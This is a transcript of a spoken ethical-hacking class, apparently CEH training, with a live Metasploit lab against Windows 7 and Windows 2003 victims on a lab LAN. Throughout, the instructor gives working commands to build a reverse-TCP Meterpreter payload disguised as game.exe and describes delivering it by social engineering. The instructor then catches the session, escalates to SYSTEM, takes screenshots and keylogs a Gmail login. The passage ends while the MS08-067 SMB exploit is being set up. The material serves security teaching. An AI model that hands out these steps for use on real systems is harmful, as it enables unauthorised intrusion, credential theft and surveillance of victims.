Okay, so today we are going to first start off with the pending labs, like I mentioned before, and the backtrack system that we have is going to be my attacker machine running Metasploit framework, and through that I'm going to target my 2003 server and my Windows 7 machines, both of them being victim machines. Okay, now okay, I'll just type it down again. Victim machine, and here on Windows 7 I'm going to take a remote shell. Okay, that is, we are going to get a command prompt shell of the Windows 7, or I'll be literally be able to take total control of the Windows 7 machine. Okay, the 2003 server again is going to be a victim machine, but on the 2003 server I'm going to extract a remote VNC session. That is, using backtrack we'll be able to get the VNC session running here, and through that we'll be able to work on the 2003 server. Okay, so that's what we'll be doing today. Okay, so this basically, I mean, when I show you this demonstration here, I'm basically going to cover two of my pending topics here. Okay, one of them is the HTTP tunneling, which I wanted to show you. Okay, HTTP tunneling, wherein I'll give you the analogy of how people can bypass the firewall by conducting these two attacks. Okay, so basically our tool for conducting this kind of an attack would be Metasploit framework, and through that I'm going to demonstrate this same HTTP tunneling as well. Okay, and then we'll move on to session hijacking, but that is going to be a bit later. Okay, but right now we are just going to focus on our first attack. Okay, so I'll just minimize my 2003 server and my Windows 7 machine, because right now I do not want to get into those. Okay, but just to give you an idea, I'll just write down the IP addresses of all the machines out there. Okay, so backtrack. Currently, backtrack is running on an IP address of 192.168.0.103. Windows 7 is running on an IP address of 192.168.0.105, and Windows 2003, okay, is having an IP address of 192.168.0.124. Okay, so these are the three IP addresses that we have. Just to quickly verify, I'm not really sure of the Windows 7 machines. So I'll just quickly go ahead and verify that, because the other machines I'm absolutely sure of, but the Windows 7 I'm not really sure. So I'll just type ipconfig out here, and oh, okay, yeah, like I said, so it's not 103, it's 102 today. So that's what I'm going to use out here. Okay, so that's the IP change, but effectively that's the kind of three machines that we have here. Okay, so I'll just minimize it. So these are the IP addresses that I'm going to use out here. You get that now? Okay. So I'll just minimize this, and let's start off with the attack. Okay, so first lab that I'm going to show you is my backtrack is going to be my attacker, and Windows 7 machine is going to be the victim. Okay, I'm going to use the Windows 7 machine as the victim machine. Do you get that now? Okay, so let me go ahead and do that. To do that, okay, what I'll do is I'll just open up the terminal here, and in the terminal I'm going to type ifconfig just to show you the IP address out here. The IP address is 192.168.0.103. Okay, now since I'm going to demonstrate this lab within a LAN, that is within my lab environment here. Okay, my IP addresses are going to be all of them part of the same range. Okay, but if it was across the internet, okay, if it was across the internet, I would have made use of like the browser. Like let's say I would have used Firefox, and I would have made use of my own public IP, as my own local IP. That is, if I go into whatismyip.com. Oh, okay. Okay, I would have used this as my public IP, or this as my local IP. Do you understand? But since I'm going to target systems within the LAN itself, I'm going to use this as my own IP. Clear? I'm going to launch the attack using this IP. Or if it was over the internet, the same attacks which I'm demonstrating right now can be done across the internet as well. But if I want to do it over the internet, then in that case, I'm supposed to use the public IP. You understand that? Okay. Yeah. So at this point, let's go ahead and target the Windows 7 and take total control of the Windows 7 machine. Okay. To do that, I'll open up another terminal. This was just to show you the IP addressing. Okay. We know the IP addressing now. I'll just minimize this. Okay. And now on this fresh terminal here, let me go ahead and start off the Metasploit. Okay. Now to launch this attack on Windows 7, I need a payload, or I need some sort of a program which I'm going to run on the Windows 7 machine so that I can take total control of the Windows 7 machine. You understand that? Okay.
A payload.
So a payload. Yeah.
It's a payload. Okay.
Yeah. Okay. So some sort of a payload which when I execute on that Windows 7 machine will now be after that would be totally under the attacker's control. That's what I want to do. I want to generate that payload. You get that now? Okay.
Yeah.
So to generate that payload, again, I'm going to use Metasploit framework to help me create that payload or generate that payload. Okay. How would I do that? To do that, okay. Now just let me know if the text is clear enough. Okay.
Right now it's clear.
Yeah, it's clear, right? Yeah. So that's what I'm going to use. MSF payload. That's the command that I'm going to use.
MSF payload.
Yeah. Okay, that's the command line that I'm going to use. But to see a list of all the payloads, the command is msf payload -l.
Okay.
Okay, to list out all the payloads. So when I do that and enter, so MSF is nothing but Metasploit framework, and the command that I'm going to use is MSF, that is Metasploit framework payload, and -l is going to list out all the payloads so that it can generate or that it can create.
Okay.
Okay. Now it gave me a list of all the payloads. Like if I scroll up, see, do you see that it is giving me all this? Okay. But out of this entire list, okay. Now I'm not going to talk about each and every payload here because it's a long list of payloads. But most importantly, the one that I'm going to really make use of, okay, is what I'm going to talk about here. The one that I'm going to make use of is Windows, the one that I'm highlighting here. Okay, so that's what I'm going to use. Windows. That means it's going to target. That means it's going to target Windows machines. So Windows Metapreter. That's what I'm going to use. Okay, Metapreter. Yeah. Okay, Metapreter, and in that I'm going to use reverse TCP.
Okay.
Okay. Now what's the logic here? The description is given here. Connect back to the attacker. Inject the Metapreter server DLL via the reflective DLL injection payload. Okay, so bottom line is, okay, once I run this, the Windows 7 machine is going to connect back to me, that is to the attacker. Okay, so just to come back to our topic of tunneling, which I was talking about earlier, to bypass the firewall, what would typically the attacker do? Now the attacker may be typically on the internet, for example. Do you get that? Okay.
Yes.
The attacker may be on the internet, and the Windows 7 machine, let's say, is behind a firewall. Okay. Now, through the firewall, the attacker cannot connect to the Windows 7 machine. Do you agree?
That's correct.
Yeah. So what the attacker now is going to do is, the attacker is now generating a payload. That's what I'm in the process of doing right now. You know, I'll generate a payload or create a payload, and then I'll give this payload across via email or via chat or some means to that user behind the firewall. Okay, I'll make use of some social engineering techniques. Okay, I'll make use of some social engineering techniques, and I'll give it to that victim. And now when the victim executes
send his email.
Yeah, either I can send it via email using a TCP binder or a TCP wrapper. You know, if you remember when we did Trojans, I can hide this particular exe which I'm going to generate using an image, or I can hide it in the game. I can do a lot of stuff, right? Lot of different things that I can do. You understand? So I'll make use of some or the other means. I'll hide that exe file which I'm going to generate, and I'm going to give it to the victim. When the victim executes that particular exe file, he is going to connect back to me, that is to the attacker. Okay, he is going to connect back to the backtrack. But when he's going to connect back to me, he is going to connect using or through the firewall. Do you understand? So effectively, what have I done now? Since he is connected, or since we have a connection going here, which means now I have totally bypassed the firewall and I am controlling, or I am working on the Windows 7. Do you agree?
Yes.
Okay, so that's the logic that I'm going to work upon out here. You understand that? Okay, so let me go ahead and show that to you. Okay, so this is the payload that I'm going to use. So I'll just copy this, and now as far as my command goes, okay, so the command that I'm going to run is msf payload, and then I'm going to paste that payload. This is what I'm going to use. Okay, this is the payload that I'm going to use. But this payload I'm going to use using certain options or arguments. Okay, so the arguments that I'm going to type is lhost, that's localhost.
That's me, please.
What's that? Okay, so lhost equal to 192.168.0.102. That's my, sorry, 103. That's my backtrack machine, my own machine. Localhost IP.
Oh, okay. Air host.
Okay. Now, along with the local host, I am also supposed to define L port. L port is nothing but local port. What is my local port through which I am going to connect? Or, like, let's put it this way: the victim has to connect back to the attacker, right?
Yeah.
So, if the victim has to connect back to the attacker, naturally, the attacker has to provide a port on which the victim has to connect, and that's what I'm defining out here.
Okay.
Okay, so L port, I'm going to put it up as commonly, normally the port that this one makes use of is 4444. That's what I'm going to use. It's a non-standard port, and that's what I'm going to use here. Okay, I can also make use of 8888 if I want to, or any other port.
Okay. Let me copy.
Was that? Yeah, sure. Okay, I'm not done yet. The command is yet to be completed, but yeah, you can type it down while I'm writing it on the screen. Okay.
Okay.
So the local port, I've defined it as 4444. So based on these two parameters, it's going to generate the payload. So for that, I'm going to type X. Okay, that's to execute it, and generate a file based on this execution. So for that, I put up a greater than sign, and then I'm going to put /root. Okay, because that's the directory where it's going to create the file. /root/ payload, or let's say we don't use payload, we'll make use of a name game.exe. So it's going to create this exe file. The name of that exe file is going to be game.exe. And I'll press enter. It's going to take some time, but eventually it's going to create this particular payload.
You say you only get to say you can put port 444 or 888.
No, you can put any port number you want, but as long as it's a non-standard port, don't use the standard ports.
Non-standard port. Okay.
Okay, so there you go. It's created. Okay, so the file has been created, but how do you see that file? Okay, now I'll just minimize it. As you notice here, I don't see it, right? Okay, so for that, I'm going to get into desktop. Okay, now that's my desktop, but it's not shown here. But once I open this, I'll go to the root directory.
How did you get to that desktop? Which one did you?
Places and desktop.
Oh, places and desktop. Oh, application.
Yeah. No. Places.
Oh, places. Okay.
Places and desktop. That's where I went.
Okay.
And under that, when I click on root, because that's where I had created the file. So under that, when I click on root, there you go. Game.exe is created.
Oh, okay.
Clear? So the exe file has been created. Okay, but I'm not going to execute the game.exe here because this is my attacker machine. I need to execute it on the victim.
Okay.
Okay, so to execute it on the victim, for now, I'm not going to send it via email or chat, because this is a demonstration, right? So we are assuming that we are sending it across to the victim. And for now, for the demonstration purpose, what I'm going to do is, I'm just going to copy this exe file. And now I'm going to get into entire network out here. Okay, I'm going to browse through the network. Entire network, Windows network. And then I'm going to get into work group because that's where my Windows 7 machine is located. Do you see this? CHPC. Okay, so CHPC is located here. So that's my Windows 7 machine. And in my Windows 7 machine, there you go. $C is listed.
Oh, okay.
Okay, $C is nothing but the C drive of the Windows 7 machine. So I'll just open that up. Once I open that up, I'm going to use documents and settings. Okay, now it's saying you do not have permission necessary to view this content. Okay, so I'm going to get back and I'll just copy this game.exe in the C drive itself. Okay, so game.exe now has been copied into the C drive of the Windows 7 machine. Do you understand that? Okay, so I'm not executing it as of now. I'm just keeping it as it is. I'll just minimize it, okay? Understood the steps until now? Until now, what I've only done is I've created a payload and I've put it or copied it onto the victim machine. I've sent it across to the victim machine. That's the only thing that I've done at this point. You understand that?
Now.
Yes.
You have it now on the backtrack desktop, right?
What's that?
You have it now on the backtrack desktop. I see that game.exe.
I have it on the backtrack, yes, but I have also copied it on the Windows 7 machine.
Okay.
Okay, so that's what I've done till now.
Okay.
Okay. Next thing what I'm going to do is I'm going to use another tool from Metasploit framework to execute or to take control of the Windows 7 machine. I need to have a tool, right? So the tool that I'm going to use out here is MSF console. So before I get on into MSF console, have you followed each and every step that I've done until now?
Up to now, the only step I didn't follow very well is the one when you go to the entire network, and then I didn't see the next
place. See, I went into entire network, Windows network,
okay,
work group.
Oh, that's me.
Okay, and there under work group, I went into CEHPC.
Yeah, that's the name of the Windows 7, right?
That's right. and in that I went into $C.
Okay.
Okay, so when I went in there, that's where I copied the file. That's where I copied the game.exe. Okay, so it's just accessing the C drive of the Windows 10 machine, and I pasted it there. That's it.
Okay.
You understand now?
Yes.
Okay. So that's what I've done, and now I'm going to run the MSF console. Do you get that?
Okay.
So MSF console is what I type, and I press enter. Now opening up the MSF console takes some time.
Okay.
So we'll just wait for it.
Okay.
Okay, there you go. Now the moment I type MSF console, it opens up this kind of a screen here, and it gives me a prompt saying MSF. Do you see that?
Yeah, you give the screen. Yeah.
Okay. Now once I've done that, okay, once I've done that, I'm supposed to use an exploit. Okay, I'm supposed to use an exploit. So to do that, I'll type show exploits.
Okay.
So when I type show exploits, it's going to give me a list of all the exploits. Okay, it's going to take time because there are 927 exploits available out there. Okay, so it has to go through all of them. Now, there you go. It gives me a listing of all of these. So I'll just try to scroll up and take you directly into what I'm going to use out here. Okay.
Okay.
As you notice, even this screen is small enough, for loading the entire list. But that's what it shows out here. Okay, so that's a list of exploits that we have. But let me now go ahead and show you what I'm going to use. Okay, so to show you what I'm going to use, it's going to be use command, use. Okay, exploits slash multi slash handler. That's the command that I'm going to run. Use exploit slash multi slash handler.
Okay.
Okay. Now under that, when I type show options.
So now it changed the.
Yeah, it changed the prompt. Yes.
Exploit handle. And then what did you type?
No, I just typed in show options.
Oh.
Okay. So under show options, well, there's nothing much to really talk about, right?
Yeah.
Okay. So that's why I'm going to type set payload. Okay, set payload, and then I'm going to sorry, not this, set payload, and then I'm going to type Windows. Okay, now I want to see the list of payloads, right? Because I cannot guess, or it's very difficult for me to remember the payload part. Okay, so to see the list of payloads, the command is show payloads. You understand?
Yes.
Show payload. And when I press enter, it's going to take some time. There you go. Okay, so I ran show payloads. Let me just show you the command that I executed. Of course, I'm not sure whether I'll be able to see it, but just to, yeah, there you go. Okay, so I typed in this command, show payloads. Okay, so when I type show payloads, I get a list here, and out of that, the one that I'm going to use is what I'm going to copy from here. There you go. Okay, so this is what I'm going to use. Windows/metapreter/reverse_TCP. You know, it was using the same thing we generated the payload. Yeah. Okay, so it's a bit difficult to remember the name, so that's why I just chose to list the payload and copy it. Okay, so I'm going to type set payload and then I'll just paste the value. You understand that?
Definitely.
Have you written it down?
Just one.
Was that?
Just 1 minute. I'll be finished.
Okay, sure, no problem.
Okay.
Okay, so I'll just press enter, and there you go. The payload has been set. Do you understand? Now let me take a look at this. Show options is what I'm going to type. Okay, so when I type show options, okay, it says, you know, it needs to have the local host IP. You know, so it's giving me the name, but the current setting is say local port 4444. That's fine, but okay, the L host or the local host, it says blank. You know, it does not know the local host at all. Do you understand? So that's what I'm going to set up right now. So to set that up, the command is set L host 192.168.0.103. That's nothing but the IP address of my backtrack system.
The L host should be in capital letter.
Well, even if you type it in lowercase, it's all right. As long as you put it up as L, yeah. As long as you put it up as L host, it should be fine.
All right.
Okay. So now when I type show options again, there you go. Now it says, okay, L host is this value, L port is 4444. That's fine. You know, so we are done, right? We have set up all the parameters. It's time to launch the attack. To launch the attack, the command is exploit.
Okay.
So when I type exploit and press enter, okay, so see, started reverse handler on 192.168.0.103 and starting the payload handler. Okay, so that's what it's saying. Now I leave it at this because, like, you know, I've not executed that game.exe yet. You understand?
Okay. Yeah, just hold on, just
yeah.
Let me see here. The your screen becomes smaller.
Is it fine now?
Yeah, that's fine.
No, I just wanted to switch over to the other machine. That's why I had
oh, okay. That's
restore.
one.
Okay, so I'm just supposed to execute exploit. That's it. Because these are messages that are coming up from the tool itself. No need to really bother about those. But
Okay.
that's the command that is important. Exploit.
Okay. All right.
Okay. Now, oh, sorry. Okay. Now that's my backtrack. So I'll just leave it in this state. And now I'll go into Windows 7. Okay. So in Windows 7 now, okay, like if you notice, I'll just keep it this way so that you're able to see it. Okay. In Windows 7, I'll go into the C drive because that's where I've copied the game.exe.
So that
Okay.
you are simulating that the victim opened the email and
that's right.
executes the game.exe.
That's right. Yeah. So now when the victim runs this game.exe, let's say, okay, so I'll just restore it and I'm just going to double click on this game.exe. Okay. So when I execute this game.exe, there you go. Do you see this? It comes up with a message here. It says sending stage 192.168.0.102 and Metapreter session 1 open. So bottom line is, it was waiting for someone to execute that game.exe, but the moment game.exe was executed, it opened up a session back to the attacker, and that's what it listened upon, and that's what is showing right now. Do you understand?
Yes.
So the moment I did that, now look at the prompt. The prompt now shows Metapreter.
Oh, okay.
Earlier it was MSF, right? But now it shows Metapreter. Okay. Now, believe me when I say it, at this point you have total control of the Windows 7 machine. Whether that machine is behind the firewall or whether that machine is well protected with all the ports closed. Still, you are now inside this Windows 7 machine. Okay, let me just show you something here. I'll open up another terminal here. Okay, that's the terminal that I open up. Ping 192.168.0.102. Okay, now I'm getting a response here, right?
Yes.
Okay, which means what its meaning is the firewall on the Windows 10 machine is not on. Yeah, it's off. Okay, the firewall on Windows 10, yeah, the firewall is off. So what I'll do is I'll just go into the control panel, system and security.
Off.
And Windows.
Oh, you want to turn it on? Okay.
Yeah, Windows 10 machine. Okay, so on the Windows 10 machine, I'll go into control panel, Windows firewall, turn Windows firewall on or off. So I'll just turn it on.
Okay.
You understand? Okay, so I've turned on the firewall and keeping the firewall on, I'll just go back into the backtrack. Okay, now that's my backtrack, but the session is not closed yet, right? So I'll just exit out of it again. Okay, so it's saying Metapreter session 1 closed. Reason user exit. Okay, and again I'll run the exploit command. Now what I'm trying to show you is Windows 7 has the firewall up. Do you understand? So ideally I'm not allowed to connect to the Windows 7 machine. Like see, if I open up this terminal here and if I try to ping Windows 7, oh, it's still showing me the ping. Firewall. Okay, the firewall may be allowing ping to get through. That's the reason it's.
That means you should not be able to ping when you have not do the exploit. It should refuse you, right?
Yeah. So that's what I wanted to demonstrate. But ICMP is going through. So. Okay. Basically, I want to block ICMP completely so that it doesn't ping or it doesn't work at all. Okay, that's what I wanted to do.
Okay.
This is not the place where we do it. Okay, let me go into advanced settings. Yeah, there you go. Inbound rules. Okay, now inbound rules, this is what it's showing me. Okay, and as you notice, file and printer sharing, echo request, ICMP4 in. It's being allowed. It shows a green tick here, right?
Yes.
So let me just double click on it. Okay, let me just double click on it, and I'll click on block connection, and I'll click on apply, and okay. You understand that? So now it's no longer going to be applied or no longer going to be allowed. Okay, let's check it out. So now if I go into backtrack and if I try to ping, there you go. It no longer pings. Do you see that? Okay. Now I'll just minimize it, and now through Metasploit I'll run the exploit command again. So right now what I'm meaning to show you is the firewall is protecting the Windows 7 machine completely, but still I'll run exploit. Okay, I'll still run exploit. It's still waiting. Okay, now while it's waiting, I'll go into my Windows 7 machine and I'll run that game.exe file again. Okay, so I ran it, and the moment I run it, okay, there you go. It says sending stage and Metapredator session 2 opened up. So bottom line is it's totally bypassing the firewall. Do you see that? Okay, and I have a session here. Now let me show you the fun part. Okay, like I've shown you that, okay, fine, I've opened up a session, but now let me show you the fun part. Okay, the fun part would be I'll type show options. Oh, okay. I just have to type options, not show options.
Show options?
No, not show options or options. Not even option. Okay, let me type help. Oh yeah. Okay, it was help, not any other command. Okay, the command that I want to see to have a look at all the commands that are possible here, it is help or question mark. Okay, either help or question mark. That's what you can type. You understand?
Okay.
Now, what I want to do is, I want to take a look at, okay, what is the user privilege under which I am running. Okay, so let's say I type who am I. I'm sure. Oh, okay. Who am I command is not available here. Okay. Now I'm not able to run this command. To run this command, I need to get hold of the command prompt of the target machine, right? Okay. Now to get the command prompt of the target machine, okay, I need to see a list of all the processes that are running on that Windows machine. You understand? To see the list of processes, the command is ps.
Oh, okay.
So when I type ps, it's going to give me a list of all the exes or all the processes that are running on that system. Do you see that? Okay, so I just ran ps and it gave me a list of all the processes. But most importantly, I'm looking out for explorer.exe. There you go. I have explorer.exe running out here. Okay, and explorer.exe is having a process ID. Okay, now which is the process ID here? Okay, if you look at it, there you go, PID. The PID value is what I need to have. Okay, that's the process ID.
Did you open it, Explorer?
No, I didn't open it. I just saw the list of processes. So under PS, okay, in front of explorer.exe, I'm just trying to search for that. Yeah, there you go. That's my explorer.exe. Okay, and for the explorer.exe, That is the process ID. You understand?
Oh, yep. Okay, 1980.
1980. Yeah, that's the value. So let me take over that process ID, or let me jump to that process ID. To jump to that process ID, the command is migrate. Okay, that's the command. Migrate and then 1980. So it says migration completed successfully. Do you see that?
Yeah.
Okay. Now if I type who am I, let's check. Okay, if I'm able to type in. Oh, sorry, not who am I. I'm supposed to type cmd.exe. Okay. Sorry, not cmd.exe. I'm supposed to get the shell, right? To get the shell, the command is shell. Okay, sorry. It just sometimes, since I'm working on Windows and Linux, sometimes I mix up the commands here. Okay, I'm supposed to.
Now you use a shell because you know that shell is installed on Windows 7. But if you don't know if shell is installed on Windows 7, what are you going to do?
No. Shell is not something to do with Windows 7. Shell is a command by which you get hold of the command shell of the target computer. It's a command under Windows 7, under Metasploit framework. Like, see, let me just show it to you. If I type question mark or help here, okay, I should get the command shell listed out here. Do you see this? Shell.
Oh, yes. Okay.
Okay, it says drop into a system command shell. That's what it's saying. Okay, so I'll type shell and I'll put enter. So when I type shell, what do you get? I get the command prompt and it says C : Windows System 32. You get that?
So, wow. Wow.
Okay.
Huh.
Okay, now this is not done yet. Now let me just show you something. Who am I? Okay, that's what I type now. When I type who am I, it says I am connected to the shell using CEH as the user. Do you get that? Okay.
Yeah.
Now, let's assume CEH, this user of CEH is not an administrator. Assume, okay, it's not an administrator, it's a regular user. So I want to escalate my privileges, or I want to elevate my privileges to that of the administrator. Do you understand? Okay. Now, how would I elevate my privileges? To elevate my privileges, there is a command get system.
Oh.
Okay. Now let me just show you get system. Okay. Okay. Sorry, I'm inside the shell. That's the reason it's not giving me get system. So I'll just exit out of it. I'm back into Metaperator, and now if I type get system, okay, there you go. It says got system via technique 1. You understand? Okay. Now let me just complete with the step. Now again I'll type shell and press enter. I'm inside the shell. Now if I type who am I, what do I get? I'm now connected to the system via NT authority system account. The local system account.
That means you become administrator for that local machine.
That's correct.
By
or I've now become the administrator of the Windows 7 machine completely.
How come before you couldn't be system until you need to get to type get system?
That's right.
Once you get system, then you type shell.
Shell. That's correct.
So get system. That means and when you type shell, it will process created Then you went back again in a victim computer.
That's correct.
On a system 32.
Yeah.
Directory. And then there you execute who am I.
Yeah. To see which user am I logging in with, or what is the privilege that I have.
Yeah. So
okay.
After you get that one, you become anti-authority.
That's correct.
So that means on a local machine.
Now you have total control of the target system. Okay. Now let me show you something else. Exit. Okay. Now I have exited out of it. Okay. Now let me put question mark again. Let me just show you something else. Let's say I want to see all the password hashes on the target computer. Okay. So I'll just type hash dump.
Hash dump.
Okay. Now, yeah. Now it's saying priv password get SAM hashes. Operation failed. The parameter is incorrect. That's what it's saying. Okay. So what I'll do is I'll again type get system, and then I'll type hash dump. Now it's still saying parameter is incorrect. Okay. So I'm not able to see the hash dump value on the Windows 10 machine. Okay, for some reason. Okay, so let me just show you something else there. Okay, let me show you a screenshot of the Windows 7 desktop. Okay, so I'll just type copy, and the command that I'm going to execute out here is screenshot. Do you understand?
Okay.
And when I press enter, there you go. That's the screenshot of the Windows 7 machine right now. I'm not even connected. I mean, I'm not even like looking at the Windows 7 machine. It just gave me a screenshot of what is happening currently on that Windows 7 machine. That's what it shows me.
Wow.
You understand that? I'll close this, and there you go. It has created a JPEG file in the root directory. Okay. Now that's not all. In fact, you can also get hold of the webcam on that target machine, Windows 7 machine. Let's say, for example, let me just load the webcam on Windows 7. On the Windows 7 virtual machine, I'll load the webcam.
What?
Okay.
Webcam?
Yeah. Let's say assume that Windows 7 machine had a webcam on it. Assume. Okay. So let's see if I can do that. Devices and USB devices. No, it's not giving me the option of webcam here. Okay, if it was VMware, I could have loaded the webcam of my laptop over here, or I've assigned the machine's webcam to this. But since I'm not able to do that, I'm not able to show you this demo. But imagine, if at all I would have had the webcam, I could have just typed webcam_list. It's saying no webcams were found on the Windows 10 machine. But if at all I could have had the webcam, I just have to type in webcam_snap. Okay, I just have to type this command, and when I press enter, it's going to activate the webcam, and it's going to give me a screenshot of whatever is happening in front of that laptop.
Every time?
Yes. No, it's going to be giving me a video feed, actual video feed of the webcam. Okay, so that's what this command can do. Okay, now let me show you something else. I'm now going to go in for key scan start.
Key scan start.
Okay, so I'll paste it. Key scan_start. That's what I'm running out here. So it says that it's starting the keystroke sniffer. So bottom line is, what has it done? It's enabled a keylogger on the Windows 7 machine. Okay. Now what I'll do is I'll go into the Windows 7 machine. let's say I open up Mozilla. Okay, I don't know, for some reason it's taking time to open up Mozilla. There you go. Okay, and now let's say I go into gmail.com. Okay, now in gmail.com I'm going to type, okay, my username and password, and when I click on sign in, it's going to sign in, right? Okay, but now have a look at this. I'll go back into my backtrack, and under my backtrack, okay, I had already started the key scan or the keylogger, right? Okay, now I want to see what I had typed. So key scan underscore dump, that's the command.
Oh, okay.
What does it show? It shows that I had accessed gmail.com. Of course, it shows gale.com, but it showed me that I have accessed gmail.com. I pressed enter, and then franklin.jon, that is what I typed. I pressed tab and I typed in the password. Do you get that?
Okay.
So I'm able to see each and every keystroke. I'm able to see each and every keylog. You know, that's what I can do. So bottom line is, these are some of the things that you can do with it. So imagine you have total control of this target system, so you can do whatever you want. Okay. In fact, I can even shut down the remote computer. Okay. Or I can kill a process. Okay. Or like, see, attempt to enable all privileges available to the current process. Okay. Or I can clear out the event log. I can run port forwarding. I can view the routing table or modify it. Okay. I can print the working directory. Okay. I can list out the directory. You understand? Okay.
How
bottom line is, yeah.
How can you print out the listing directory? You can list them, but you cannot print them.
Print in the sense, print it on the screen. That's what it means.
Oh, honestly, okay.
See, it's saying that I'm currently in C:\Windows System 32. Okay, so that is what is showing me here. Clear about that?
Yeah, PW. Oh, this is present working directory, correct?
Yeah, yeah, that's correct. Okay, if I type dir, okay, I think it's not dir. To get a list of yeah, ls is what I need to type. Sorry. ls is going to work like the dir and give me a list of all the files under this directory, Windows System 32.
Okay.
There you go. These are the list of files that I have on that particular system. You understand that?
On the Windows 7?
That's correct. Okay. In fact, let me just show you one more thing. One last thing before we finish with this lab. mkdir. In fact, let me put it this way. cd dot dot. Okay. cd dot dot. I'll just put cd dot dot twice so that it takes me out to the C drive. If I type pwd, there you go. I am on the C drive right now. Do you understand? Okay. And now I'm going to type cd users, okay, backslash CEH, that's the username, backslash desktop, okay, it's saying system cannot find the file specified. So cd user, okay, and ls is what I'm going to type in. Now this is what it has. So cd CEH ls. Now that's what this one has, and now I'm going to get it into desktop. CD desktop. Okay. Now if I type pwd, that's where I am. I am on the user's desktop. Okay, and then I'm going to type mkdir Franklin. I'm going to create a directory by the name Franklin on the desktop of Windows 7. Let's check it out. Okay, so if I type screenshot, no, not screenshot, get desktop. Sorry, I need to get it into Windows 7 virtual machine right now. And if I look at the desktop on Windows 7, there you go. I have the directory by the name Franklin created. You see that?
Yes.
So remotely, I can create files, delete files, manage this computer the way I want it. You understand that? So understood this lab, understood the power of Metasploit framework?
Yes.
Okay. So I'll just type exit out of it and done. So that's what I did for this first lab. You know, so right now if you look at it, I have demonstrated to you tunneling and I've demonstrated to you hacking Windows 7. You understand that?
Yes.
The next lab or next pending lab that I'm going to demonstrate to you is getting hold of a VNC session for 2003 using Metasploit again. Okay, so to do that, okay, so until now, are you clear with the lab? Do you have any questions on this? Okay.
No.
Okay. Okay. So now what I'm going to target is the 2003 server. You understand? Okay. So again, the same story. I'm going to go to the 2003 server right now. And first thing what I'll do is I'll enable the firewall on it. You know, so that I show you that okay, we are bypassing the firewall and still we are able to connect to it. You understand that? So I'll turn on the firewall and click on OK. Close. And now if I go into my backtrack,
so you went to the network interface, network firewall.
Local area connection, properties, advanced, and here I clicked on settings and I turned it on. That's it. Okay. So I just did that, and since I did that, when I go back into backtrack, okay, and if I try to ping the IP address of 2003, that is 192.168.0.124. Okay, it's still pinging because ICMP is being allowed through the firewall. You understand that? Okay, but let me just show you an example of the same. I'll just go into 2003 server, and what I'm going to do is I'll start the telnet service on this. Sorry. Okay, I'll start the telnet service on this. Net start telnet. Okay, now it's saying the service cannot be started because either it is disabled or it has been it has no enabled devices associated with it. Okay, so it's saying telnet service has been disabled on this machine. That's because I had installed Service Pack 1, you know, over the weekend.
Okay.
And Service Pack 1, what it does is it disables the telnet service altogether.
Okay.
So there you go. Telnet is here. So I'll just double click on it, and there you go. The startup type is disabled. So I'll set it to manual first of all. Okay, and then I'll start the telnet service. And now, when I go into the firewall, you know, just to show you that the firewall is working, when I get into settings right now, and if I click on exceptions, you know, it's only allowing file and printer sharing. Okay, but as far as the web access is concerned or something like that, it's not allowing me that. In fact, it doesn't show me telnet as well. You understand?
Yes.
So let me go into backtrack, and from backtrack, let me try telnetting into that IP. See, it's saying trying, but it's not connected. You get that? That's because the firewall is blocking the access. Okay, it's going to take some time to time out, but eventually, that's the whole idea about it. You understand that? It's not allowing the telnet. Okay, so now based on this thing that we have, let's go ahead and start attacking 2003 server. In fact, I'll attack it in such a manner that we'll be able to see the same desktop of 2003 on this particular screen here of backtrack. You understand?
Yes.
So let's go ahead and do that. To do that, again, I'm going to use the same tool like before. Okay, I'm going to use the same tool like before, that is MSF console. That's what I'm going to use.
Okay.
Okay, now for this particular attack, what I'm going to do is I'm going to exploit one of the problems that 2003 servers have. You know, in fact, let me just show you this. I'll go into my 2003 server, and now if I cancel all of this, close all of this, and if I go into start my computer properties, if I go into that, you'll notice that I've installed Service Pack 1, right?
Yes.
Okay, which means I've protected this machine to a certain extent. In fact, I've put a firewall and I've protected this machine to a certain extent. But still, even though it has Service Pack 1, okay, let me show you something. I'll just type exit out of this. Okay, I'll come back into my major prompt. I'll come back to the MSF console a bit later. Right now I'm here. Okay, now over here I'm going to use Nmap. Do you remember this tool Nmap?
So you want to map the network?
Yes, I'm going to port scan. Okay, so I'm going to type in Nmap -v, and then I'm going to type in 192.168.0.102. Sorry, 124. That's the IP address of my 2003 server, and I'll press enter. Okay, so it found 2 open ports here. That's it. It didn't find any other open port. But one thing you'll notice is, even though the firewall was on, it is still allowing TCP port 445, right? And TCP port 445 is typically used for Microsoft DS or Microsoft Directory Service, and that's what we are going to exploit. Okay, so we are going to exploit this particular port. Do you understand that?
445. What about 139?
No, 139. Well, that's a NetBIOS session again, but we are going to commonly target this particular port, TCP port 445. Do you understand that?
Yes.
Okay. So let me go ahead and again run MSF console. That will open up the Metasploit framework console here.
Usually port 445, what is used for?
Microsoft Directory Service.
Directory Service is always open?
Yes. Yes. Yeah, it's always open. If it's a Windows machine, it's going to be open. You understand? Okay. Now, as you notice, I got the prompt of MSF, that's Microsoft Framework. Metasploit Framework. Okay. Now on the screen, I'll type show exploits. Do you understand? Show exploits is going to give me a lot of long list of exploits.
Yeah.
Of course, 927 exploits is what it's going to show me, so that's going to take some time to load.
Okay. Now this port 445, TCP port 445.
Yes.
Everybody in IT, they know that port is always open.
Yes, that's right.
Correct. Now, what do you do about it in order to prevent attack?
No, there are patches available for it. Microsoft has given me patches. Okay, but I've not installed that patch on this system. That's what I wanted to show you. Since I've only installed the service pack, but there is service pack 2 also available.
Okay.
You understand? For 2003, service pack 2 is also available. There is a separate patch for this kind of a vulnerability. So that patch, once you install, it is safe. But since my server doesn't have the patch, I can easily demonstrate this attack to you. You understand that?
Yeah. So now, suppose you put all the patches needed, and the attacker wants anyway to attack that server. So what are the tools?
For that we have come across a lot of tools till date, if you remember.
Oh, okay.
Okay, so it's all about the skills of how we can use it. You can make Trojans, you can do a lot of stuff with it.
Okay.
You understand that? Okay. Now, as far as the one that I want to use is concerned, yeah, this is what I want to use. Windows SMB MS08067 Net API. This is one of the exploits which will target that same port 445. Do you understand that? So that's what I'm going to use. So I'll just copy this, and the command that I'm going to run out here is going to be use, and then I'll paste this particular thing. Immediately it takes me into this particular prompt.
Oh, okay.
Okay, so once I get to this prompt, you have noted it down?
Yeah, that's what I'm doing now.
Okay.
So the prompt change. So now it does not allow spaces. You put underscore on it. Okay.
That's why I prefer to always copy and paste the value rather than manually typing it, because there may be typing errors and so on, right?
Yes. Okay, I'm ready.
